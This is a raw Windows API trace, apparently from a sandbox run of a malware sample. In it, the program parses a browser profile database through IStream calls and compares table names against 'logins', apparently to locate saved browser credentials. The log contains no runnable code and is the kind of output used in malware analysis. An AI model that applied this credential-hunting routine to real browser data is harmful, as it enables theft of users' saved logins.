CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x52da80 | out: ppstm=0x52da80*=0x5ec250) returned 0x0 [0590.139] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.139] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.139] IStream:LockRegion (This=0x57ea78, libOffset=0xb1a3, cb=0x0, dwLockType=0x0) returned 0x0 [0590.139] IStream:SetSize (This=0x57ea78, libNewSize=0x2f09968) returned 0x0 [0590.139] IStream:Commit (This=0x5ec250, grfCommitFlags=0x2f09968) returned 0x0 [0590.139] LocalFree (hMem=0x2f09968) returned 0x0 [0590.139] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.139] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0590.139] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.139] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.139] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0590.139] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.139] LocalAlloc (uFlags=0x40, uBytes=0x98) returned 0x56ff38 [0590.139] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.139] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.139] IStream:LockRegion (This=0x5ec250, libOffset=0x1, cb=0x0, dwLockType=0x0) returned 0x0 [0590.139] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.139] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.139] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.139] IStream:LockRegion (This=0x5ec250, libOffset=0x2, cb=0x0, dwLockType=0x0) returned 0x0 [0590.139] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.139] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.139] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.139] IStream:LockRegion (This=0x5ec250, libOffset=0x3, cb=0x0, dwLockType=0x0) returned 0x0 [0590.139] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.139] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.139] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.139] IStream:LockRegion (This=0x5ec250, libOffset=0x4, cb=0x0, dwLockType=0x0) returned 0x0 [0590.139] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.139] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.139] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.139] IStream:LockRegion (This=0x5ec250, libOffset=0x5, cb=0x0, dwLockType=0x0) returned 0x0 [0590.139] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.139] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.139] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.139] IStream:LockRegion (This=0x5ec250, libOffset=0x6, cb=0x0, dwLockType=0x0) returned 0x0 [0590.139] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.139] LocalAlloc (uFlags=0x40, uBytes=0x94) returned 0x56fe98 [0590.139] LocalAlloc (uFlags=0x40, uBytes=0x85) returned 0x57c6e0 [0590.139] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.139] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.139] IStream:LockRegion (This=0x5ec250, libOffset=0x7, cb=0x0, dwLockType=0x0) returned 0x0 [0590.139] IStream:SetSize (This=0x5ec250, libNewSize=0x57c6e0) returned 0x0 [0590.139] LocalAlloc (uFlags=0x40, uBytes=0x8d) returned 0x58d970 [0590.139] LocalFree (hMem=0x57c6e0) returned 0x0 [0590.139] LocalAlloc (uFlags=0x40, uBytes=0x99) returned 0x5d1978 [0590.139] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.139] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.139] IStream:LockRegion (This=0x5ec250, libOffset=0xc, cb=0x0, dwLockType=0x0) returned 0x0 [0590.139] IStream:SetSize (This=0x5ec250, libNewSize=0x5d1978) returned 0x0 [0590.139] LocalAlloc (uFlags=0x40, uBytes=0xa1) returned 0x59a9c8 [0590.139] LocalFree (hMem=0x5d1978) returned 0x0 [0590.139] LocalAlloc (uFlags=0x40, uBytes=0x99) returned 0x5d1978 [0590.140] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.140] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.140] IStream:LockRegion (This=0x5ec250, libOffset=0x25, cb=0x0, dwLockType=0x0) returned 0x0 [0590.140] IStream:SetSize (This=0x5ec250, libNewSize=0x5d1978) returned 0x0 [0590.140] LocalAlloc (uFlags=0x40, uBytes=0xa1) returned 0x5d3958 [0590.140] LocalFree (hMem=0x5d1978) returned 0x0 [0590.140] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.140] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.140] IStream:LockRegion (This=0x5ec250, libOffset=0x3e, cb=0x0, dwLockType=0x0) returned 0x0 [0590.140] IStream:SetSize (This=0x5ec250, libNewSize=0x52da1f) returned 0x0 [0590.140] LocalAlloc (uFlags=0x40, uBytes=0x8c) returned 0x58d548 [0590.140] LocalAlloc (uFlags=0x40, uBytes=0xcb) returned 0x5977a0 [0590.140] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.140] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.140] IStream:LockRegion (This=0x5ec250, libOffset=0x3f, cb=0x0, dwLockType=0x0) returned 0x0 [0590.140] IStream:SetSize (This=0x5ec250, libNewSize=0x5977a0) returned 0x0 [0590.140] LocalAlloc (uFlags=0x40, uBytes=0xd3) returned 0x5dbdf0 [0590.140] LocalFree (hMem=0x5977a0) returned 0x0 [0590.140] LocalFree (hMem=0x56ff38) returned 0x0 [0590.140] IUnknown:Release (This=0x5ec250) returned 0x0 [0590.140] lstrcmpiA (lpString1="autofill_model_type_state", lpString2="logins") returned -1 [0590.140] LocalFree (hMem=0x58d970) returned 0x0 [0590.140] LocalFree (hMem=0x59a9c8) returned 0x0 [0590.140] LocalFree (hMem=0x5d3958) returned 0x0 [0590.140] LocalFree (hMem=0x58d548) returned 0x0 [0590.140] LocalFree (hMem=0x5dbdf0) returned 0x0 [0590.140] LocalFree (hMem=0x56fe98) returned 0x0 [0590.140] IStream:LockRegion (This=0x57ea78, libOffset=0xb0e6, cb=0x0, dwLockType=0x0) returned 0x0 [0590.140] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.140] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.140] IStream:LockRegion (This=0x57ea78, libOffset=0xb0e6, cb=0x0, dwLockType=0x0) returned 0x0 [0590.140] IStream:SetSize (This=0x57ea78, libNewSize=0x52da6b) returned 0x0 [0590.140] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.140] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.140] IStream:LockRegion (This=0x57ea78, libOffset=0xb0e7, cb=0x0, dwLockType=0x0) returned 0x0 [0590.140] IStream:SetSize (This=0x57ea78, libNewSize=0x52da6b) returned 0x0 [0590.140] LocalAlloc (uFlags=0x40, uBytes=0x880) returned 0x2f09968 [0590.140] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x52da80 | out: ppstm=0x52da80*=0x5ec250) returned 0x0 [0590.140] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.140] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.140] IStream:LockRegion (This=0x57ea78, libOffset=0xb0e8, cb=0x0, dwLockType=0x0) returned 0x0 [0590.140] IStream:SetSize (This=0x57ea78, libNewSize=0x2f09968) returned 0x0 [0590.140] IStream:Commit (This=0x5ec250, grfCommitFlags=0x2f09968) returned 0x0 [0590.140] LocalFree (hMem=0x2f09968) returned 0x0 [0590.140] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.141] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0590.141] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.141] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.141] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0590.141] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.141] LocalAlloc (uFlags=0x40, uBytes=0x98) returned 0x56fe98 [0590.141] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.141] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.141] IStream:LockRegion (This=0x5ec250, libOffset=0x1, cb=0x0, dwLockType=0x0) returned 0x0 [0590.141] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.141] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.141] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.141] IStream:LockRegion (This=0x5ec250, libOffset=0x2, cb=0x0, dwLockType=0x0) returned 0x0 [0590.141] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.141] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.141] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.141] IStream:LockRegion (This=0x5ec250, libOffset=0x3, cb=0x0, dwLockType=0x0) returned 0x0 [0590.141] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.141] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.141] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.141] IStream:LockRegion (This=0x5ec250, libOffset=0x4, cb=0x0, dwLockType=0x0) returned 0x0 [0590.141] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.141] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.141] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.141] IStream:LockRegion (This=0x5ec250, libOffset=0x5, cb=0x0, dwLockType=0x0) returned 0x0 [0590.141] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.141] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.141] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.141] IStream:LockRegion (This=0x5ec250, libOffset=0x6, cb=0x0, dwLockType=0x0) returned 0x0 [0590.141] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.141] LocalAlloc (uFlags=0x40, uBytes=0x94) returned 0x56ff38 [0590.141] LocalAlloc (uFlags=0x40, uBytes=0x85) returned 0x57c6e0 [0590.141] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.141] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.141] IStream:LockRegion (This=0x5ec250, libOffset=0x7, cb=0x0, dwLockType=0x0) returned 0x0 [0590.141] IStream:SetSize (This=0x5ec250, libNewSize=0x57c6e0) returned 0x0 [0590.141] LocalAlloc (uFlags=0x40, uBytes=0x8d) returned 0x58d548 [0590.141] LocalFree (hMem=0x57c6e0) returned 0x0 [0590.141] LocalAlloc (uFlags=0x40, uBytes=0x8d) returned 0x58d970 [0590.141] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.141] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.141] IStream:LockRegion (This=0x5ec250, libOffset=0xc, cb=0x0, dwLockType=0x0) returned 0x0 [0590.141] IStream:SetSize (This=0x5ec250, libNewSize=0x58d970) returned 0x0 [0590.141] LocalAlloc (uFlags=0x40, uBytes=0x95) returned 0x56ffd8 [0590.141] LocalFree (hMem=0x58d970) returned 0x0 [0590.141] LocalAlloc (uFlags=0x40, uBytes=0x8d) returned 0x58d970 [0590.141] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.141] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.142] IStream:LockRegion (This=0x5ec250, libOffset=0x19, cb=0x0, dwLockType=0x0) returned 0x0 [0590.142] IStream:SetSize (This=0x5ec250, libNewSize=0x58d970) returned 0x0 [0590.142] LocalAlloc (uFlags=0x40, uBytes=0x95) returned 0x570078 [0590.142] LocalFree (hMem=0x58d970) returned 0x0 [0590.142] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.142] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.142] IStream:LockRegion (This=0x5ec250, libOffset=0x26, cb=0x0, dwLockType=0x0) returned 0x0 [0590.142] IStream:SetSize (This=0x5ec250, libNewSize=0x52da1f) returned 0x0 [0590.142] LocalAlloc (uFlags=0x40, uBytes=0x8c) returned 0x58d970 [0590.142] LocalAlloc (uFlags=0x40, uBytes=0xd6) returned 0x5dbdf0 [0590.142] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.142] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.142] IStream:LockRegion (This=0x5ec250, libOffset=0x27, cb=0x0, dwLockType=0x0) returned 0x0 [0590.142] IStream:SetSize (This=0x5ec250, libNewSize=0x5dbdf0) returned 0x0 [0590.142] LocalAlloc (uFlags=0x40, uBytes=0xde) returned 0x2ed0148 [0590.142] LocalFree (hMem=0x5dbdf0) returned 0x0 [0590.142] LocalFree (hMem=0x56fe98) returned 0x0 [0590.142] IUnknown:Release (This=0x5ec250) returned 0x0 [0590.142] lstrcmpiA (lpString1="token_service", lpString2="logins") returned 1 [0590.142] LocalFree (hMem=0x58d548) returned 0x0 [0590.142] LocalFree (hMem=0x56ffd8) returned 0x0 [0590.142] LocalFree (hMem=0x570078) returned 0x0 [0590.142] LocalFree (hMem=0x58d970) returned 0x0 [0590.142] LocalFree (hMem=0x2ed0148) returned 0x0 [0590.142] LocalFree (hMem=0x56ff38) returned 0x0 [0590.142] IStream:LockRegion (This=0x57ea78, libOffset=0xb165, cb=0x0, dwLockType=0x0) returned 0x0 [0590.142] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.142] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.142] IStream:LockRegion (This=0x57ea78, libOffset=0xb165, cb=0x0, dwLockType=0x0) returned 0x0 [0590.142] IStream:SetSize (This=0x57ea78, libNewSize=0x52da6b) returned 0x0 [0590.142] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.142] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.142] IStream:LockRegion (This=0x57ea78, libOffset=0xb166, cb=0x0, dwLockType=0x0) returned 0x0 [0590.142] IStream:SetSize (This=0x57ea78, libNewSize=0x52da6b) returned 0x0 [0590.142] LocalAlloc (uFlags=0x40, uBytes=0x880) returned 0x2f09968 [0590.142] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x52da80 | out: ppstm=0x52da80*=0x5ec250) returned 0x0 [0590.142] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.142] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.142] IStream:LockRegion (This=0x57ea78, libOffset=0xb167, cb=0x0, dwLockType=0x0) returned 0x0 [0590.142] IStream:SetSize (This=0x57ea78, libNewSize=0x2f09968) returned 0x0 [0590.142] IStream:Commit (This=0x5ec250, grfCommitFlags=0x2f09968) returned 0x0 [0590.142] LocalFree (hMem=0x2f09968) returned 0x0 [0590.142] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.142] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0590.142] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.142] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.142] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0590.142] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.142] LocalAlloc (uFlags=0x40, uBytes=0x94) returned 0x56ff38 [0590.142] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.143] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.143] IStream:LockRegion (This=0x5ec250, libOffset=0x1, cb=0x0, dwLockType=0x0) returned 0x0 [0590.143] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.143] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.143] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.143] IStream:LockRegion (This=0x5ec250, libOffset=0x2, cb=0x0, dwLockType=0x0) returned 0x0 [0590.143] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.143] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.143] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.143] IStream:LockRegion (This=0x5ec250, libOffset=0x3, cb=0x0, dwLockType=0x0) returned 0x0 [0590.143] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.143] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.143] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.143] IStream:LockRegion (This=0x5ec250, libOffset=0x4, cb=0x0, dwLockType=0x0) returned 0x0 [0590.143] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.143] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.143] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.143] IStream:LockRegion (This=0x5ec250, libOffset=0x5, cb=0x0, dwLockType=0x0) returned 0x0 [0590.143] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.143] LocalAlloc (uFlags=0x40, uBytes=0x94) returned 0x570078 [0590.143] LocalAlloc (uFlags=0x40, uBytes=0x85) returned 0x57c6e0 [0590.143] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.143] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.143] IStream:LockRegion (This=0x5ec250, libOffset=0x6, cb=0x0, dwLockType=0x0) returned 0x0 [0590.143] IStream:SetSize (This=0x5ec250, libNewSize=0x57c6e0) returned 0x0 [0590.143] LocalAlloc (uFlags=0x40, uBytes=0x8d) returned 0x58d970 [0590.143] LocalFree (hMem=0x57c6e0) returned 0x0 [0590.143] LocalAlloc (uFlags=0x40, uBytes=0xa0) returned 0x5d1978 [0590.143] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.143] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.143] IStream:LockRegion (This=0x5ec250, libOffset=0xb, cb=0x0, dwLockType=0x0) returned 0x0 [0590.143] IStream:SetSize (This=0x5ec250, libNewSize=0x5d1978) returned 0x0 [0590.143] LocalAlloc (uFlags=0x40, uBytes=0xa8) returned 0x5d3958 [0590.143] LocalFree (hMem=0x5d1978) returned 0x0 [0590.143] LocalAlloc (uFlags=0x40, uBytes=0x8d) returned 0x58d548 [0590.143] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.143] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.143] IStream:LockRegion (This=0x5ec250, libOffset=0x2b, cb=0x0, dwLockType=0x0) returned 0x0 [0590.143] IStream:SetSize (This=0x5ec250, libNewSize=0x58d548) returned 0x0 [0590.143] LocalAlloc (uFlags=0x40, uBytes=0x95) returned 0x56ffd8 [0590.143] LocalFree (hMem=0x58d548) returned 0x0 [0590.143] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.143] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.143] IStream:LockRegion (This=0x5ec250, libOffset=0x38, cb=0x0, dwLockType=0x0) returned 0x0 [0590.143] IStream:SetSize (This=0x5ec250, libNewSize=0x52da1f) returned 0x0 [0590.143] LocalAlloc (uFlags=0x40, uBytes=0x8c) returned 0x58d548 [0590.143] LocalAlloc (uFlags=0x40, uBytes=0x88) returned 0x57c6e0 [0590.143] LocalFree (hMem=0x56ff38) returned 0x0 [0590.143] IUnknown:Release (This=0x5ec250) returned 0x0 [0590.143] lstrcmpiA (lpString1="token_service", lpString2="logins") returned 1 [0590.143] LocalFree (hMem=0x58d970) returned 0x0 [0590.143] LocalFree (hMem=0x5d3958) returned 0x0 [0590.143] LocalFree (hMem=0x56ffd8) returned 0x0 [0590.143] LocalFree (hMem=0x58d548) returned 0x0 [0590.143] LocalFree (hMem=0x57c6e0) returned 0x0 [0590.143] LocalFree (hMem=0x570078) returned 0x0 [0590.143] IStream:LockRegion (This=0x57ea78, libOffset=0xb763, cb=0x0, dwLockType=0x0) returned 0x0 [0590.143] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.143] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.143] IStream:LockRegion (This=0x57ea78, libOffset=0xb763, cb=0x0, dwLockType=0x0) returned 0x0 [0590.143] IStream:SetSize (This=0x57ea78, libNewSize=0x52da6b) returned 0x0 [0590.143] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.143] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.144] IStream:LockRegion (This=0x57ea78, libOffset=0xb764, cb=0x0, dwLockType=0x0) returned 0x0 [0590.144] IStream:SetSize (This=0x57ea78, libNewSize=0x52da6b) returned 0x0 [0590.144] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.144] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.144] IStream:LockRegion (This=0x57ea78, libOffset=0xb765, cb=0x0, dwLockType=0x0) returned 0x0 [0590.144] IStream:SetSize (This=0x57ea78, libNewSize=0x52da6b) returned 0x0 [0590.144] LocalAlloc (uFlags=0x40, uBytes=0x880) returned 0x2f09968 [0590.144] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x52da80 | out: ppstm=0x52da80*=0x5ec250) returned 0x0 [0590.144] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.144] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.144] IStream:LockRegion (This=0x57ea78, libOffset=0xb766, cb=0x0, dwLockType=0x0) returned 0x0 [0590.144] IStream:SetSize (This=0x57ea78, libNewSize=0x2f09968) returned 0x0 [0590.144] IStream:Commit (This=0x5ec250, grfCommitFlags=0x2f09968) returned 0x0 [0590.144] LocalFree (hMem=0x2f09968) returned 0x0 [0590.144] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.144] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0590.144] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.144] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.144] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0590.144] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.144] LocalAlloc (uFlags=0x40, uBytes=0x98) returned 0x570078 [0590.144] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.144] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.144] IStream:LockRegion (This=0x5ec250, libOffset=0x1, cb=0x0, dwLockType=0x0) returned 0x0 [0590.144] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.144] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.144] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.144] IStream:LockRegion (This=0x5ec250, libOffset=0x2, cb=0x0, dwLockType=0x0) returned 0x0 [0590.144] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.144] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.144] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.144] IStream:LockRegion (This=0x5ec250, libOffset=0x3, cb=0x0, dwLockType=0x0) returned 0x0 [0590.144] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.144] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.144] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.144] IStream:LockRegion (This=0x5ec250, libOffset=0x4, cb=0x0, dwLockType=0x0) returned 0x0 [0590.144] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.144] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.144] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, 